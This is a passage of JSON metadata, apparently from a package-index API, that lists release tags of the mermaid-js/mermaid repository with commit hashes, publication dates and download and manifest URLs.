-js/mermaid@8.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0/manifests"},{"name":"8.13.11","sha":"3877b88e6e1dba5d3e52ea23fad66d0545ec5ab0","kind":"commit","published_at":"2022-02-10T16:10:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.11","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11/manifests"},{"name":"8.13.10","sha":"2de2cb64f8d0fa6917e0fae071c0a03bba10df83","kind":"commit","published_at":"2022-01-22T09:11:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10/manifests"},{"name":"8.13.9","sha":"77f2a57155cfd9375eb0f633d365b6bd75c31158","kind":"commit","published_at":"2022-01-16T14:28:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9/manifests"},{"name":"8.13.8","sha":"65592e0541790968703f16bc0b91a641b5443111","kind":"commit","published_at":"2021-12-28T16:31:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8/manifests"},{"name":"8.13.7","sha":"52af0476c14be9f98d669e336a5625f5fb609aee","kind":"commit","published_at":"2021-12-22T20:20:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7/manifests"},{"name":"8.13.6","sha":"a44714c715e49ff2dc86a401962dc5929b6eca06","kind":"commit","published_at":"2021-12-16T19:06:50.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6/manifests"},{"name":"real-8.13.5","sha":"7da80812e0510ae04f9ebf3a151a048ef9ce6834","kind":"commit","published_at":"2021-12-08T06:53:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/real-8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/real-8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@real-8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5/manifests"},{"name":"8.13.5","sha":"2ce18ec2a8c6f6c2ece20f749628443ac663119f","kind":"commit","published_at":"2021-12-07T22:09:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5/manifests"},{"name":"8.13.4","sha":"650bcef3d1f940aec0cf4b81d1433b74b5e0f55c","kind":"commit","published_at":"2021-11-18T16:11:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4/manifests"},{"name":"8.13.3","sha":"0d7d5ddc5fbd8482dd7e907d3eef41cd1240f68f","kind":"commit","published_at":"2021-10-14T19:19:28.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3/manifests"},{"name":"8.13.2","sha":"2758d6477803dd9e5e8975b0d93b33c69be7b377","kind":"commit","published_at":"2021-09-29T18:22:45.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2/manifests"},{"name":"8.13.1","sha":"029042393c795b4b3ef9c91ae66564610e4b0c89","kind":"commit","published_at":"2021-09-29T18:05:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1/manifests"},{"name":"8.13.0","sha":"75b79e1b23f288e4706f21f62925c17c676cf4c0","kind":"commit","published_at":"2021-09-29T06:45:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0/manifests"},{"name":"8.12.1","sha":"48b6a32fe19af7e600fb0df900aa5956159e52d7","kind":"commit","published_at":"2021-08-26T17:43:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1/manifests"},{"name":"8.12.0","sha":"296a64f465021a8424cd72d495a24f4cc3c59c1e","kind":"commit","published_at":"2021-08-26T17:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0/manifests"},{"name":"8.11.5","sha":"962998810bccd537365f7de45891ebba48487cde","kind":"commit","published_at":"2021-08-15T15:41:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5/manifests"},{"name":"8.11.4","sha":"a670b678445f2894844ecbe7352f994396caa518","kind":"commit","published_at":"2021-08-05T17:58:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4/manifests"},{"name":"8.11.3","sha":"af7f5d0aaf3ede2f2efca6f24ec527c4e7065e2f","kind":"commit","published_at":"2021-08-04T17:25:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3/manifests"},{"name":"8.11.2","sha":"9245b0bb8b82c200c7c7a277cd619db6e5dd7715","kind":"commit","published_at":"2021-07-29T17:34:51.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2/manifests"},{"name":"8.11.1","sha":"33e8ee6c0e8bfd03f5d3fee51237a156c2e5a537","kind":"commit","published_at":"2021-07-28T13:54:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1/manifests"},{"name":"untagged-78173a5e15ffdf8f1e6a","sha":"52b1b23d4753a3d068e19052e5f4d25e88057517","kind":"commit","published_at":"2021-07-15T12:54:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-78173a5e15ffdf8f1e6a","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-78173a5e15ffdf8f1e6a","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-78173a5e15ffdf8f1e6a","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a/manifests"},{"name":"8.11.0-rc2","sha":"1d782678715699e8485480bff309adc2b648c7c1","kind":"commit","published_at":"2021-06-27T05:57:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0-rc2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2/manifests"},{"name":"8.11.0","sha":"eef4ef54a177c96b0efcf1c8c98f8d4d9f454e00","kind":"commit","published_at":"2021-06-25T10:27:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0/manifests"},{"name":"untagged-f83ec2a9deaf6677e0c7","sha":"e6e94ad57ea06ef8627bf91ddfbd88f5082952bf","kind":"commit","published_at":"2021-06-05T10:11:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f83ec2a9deaf6677e0c7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f83ec2a9deaf6677e0c7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f83ec2a9deaf6677e0c7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7/manifests"},{"name":"8.10.1","sha":"417428aceada045eabcc92826c68e08a1329c98f","kind":"commit","published_at":"2021-05-10T16:14:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1/manifests"},{"name":"8.9.3","sha":"8b3ac57ce7e6ae6ea4a66a9d8a28d8fcde936bb9","kind":"commit","published_at":"2021-04-25T11:24:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3/manifests"},{"name":"untagged-502e9410f3e7fd2ed484","sha":"45918da48ec99a706aa2b39598ae32cdccf95004","kind":"commit","published_at":"2021-04-25T10:27:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-502e9410f3e7fd2ed484","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-502e9410f3e7fd2ed484","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-502e9410f3e7fd2ed484","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484/manifests"},{"name":"8.9.2","sha":"a5cc75c1f7b722ebd0c2f848b25e2350655841dd","kind":"commit","published_at":"2021-03-18T20:02:49.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2/manifests"},{"name":"8.9.1","sha":"be95b93a2d91d62bc8618b906356514232b4343d","kind":"commit","published_at":"2021-02-18T20:41:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1/manifests"},{"name":"8.9.0","sha":"3c5da00230a586843364ff55f909fe27be2c0b41","kind":"tag","published_at":"2021-01-21T18:49:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0/manifests"},{"name":"v8.8.4","sha":"d6b2bcf0d23af89f65de659d2d7edd32a41ccddc","kind":"tag","published_at":"2020-12-05T13:43:29.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v8.8.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v8.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v8.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4/manifests"},{"name":"8.8.3","sha":"e3cf8b78437bb542029e91a022c81fbd4d361e6a","kind":"commit","published_at":"2020-11-05T19:09:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3/manifests"},{"name":"8.8.2","sha":"0f9da18cbe9bea6021ab78553902e5a1a517d61a","kind":"commit","published_at":"2020-10-08T17:48:33.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2/manifests"},{"name":"8.8.1","sha":"4dc805d25add19ae07ac9fe8951b4036332e0530","kind":"commit","published_at":"2020-09-30T17:23:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1/manifests"},{"name":"8.8.0","sha":"0918b97e815ad77e8b8e88ebb52400937f197885","kind":"commit","published_at":"2020-09-05T07:46:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0/manifests"},{"name":"8.7.0","sha":"4c38b1a776d83a00e12dd820b1bee455c3954e3c","kind":"commit","published_at":"2020-08-09T12:03:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0/manifests"},{"name":"8.6.4","sha":"95b7e4f9adc560dfd2ec6cc2b1f43397b2641012","kind":"commit","published_at":"2020-07-26T12:09:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4/manifests"},{"name":"8.6.3","sha":"d12b197ec951fa74574b4ef9fb95a55881cdd7a9","kind":"commit","published_at":"2020-07-24T06:28:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3/manifests"},{"name":"8.6.2","sha":"f68536357415d16b239e04a98e6195227399557e","kind":"commit","published_at":"2020-07-22T17:22:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2/manifests"},{"name":"8.6.0","sha":"b4203992bf98c209a578b1139c44d107b708ca6c","kind":"commit","published_at":"2020-07-13T14:42:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0/manifests"},{"name":"8.5.2","sha":"e9e5c75decbd5f5bdcf6c9d63c8f8f553263f6e2","kind":"commit","published_at":"2020-06-07T08:39:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2/manifests"},{"name":"8.5.1","sha":"9470a4f1edc0d0d5b8398e2c41029895fa5f738a","kind":"tag","published_at":"2020-05-17T08:12:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1/manifests"},{"name":"untagged-566ebfbf21141b604025","sha":"0ac48a431a319b2ff7aaaef889ddd53f153acc6d","kind":"commit","published_at":"2020-05-13T17:32:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-566ebfbf21141b604025","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-566ebfbf21141b604025","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-566ebfbf21141b604025","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025/manifests"},{"name":"untagged-31c93788afe260d914bb","sha":"5bdffd7d20c5622540c691ba63f635b8eedabf40","kind":"commit","published_at":"2020-04-11T16:10:53.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-31c93788afe260d914bb","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-31c93788afe260d914bb","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-31c93788afe260d914bb","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c937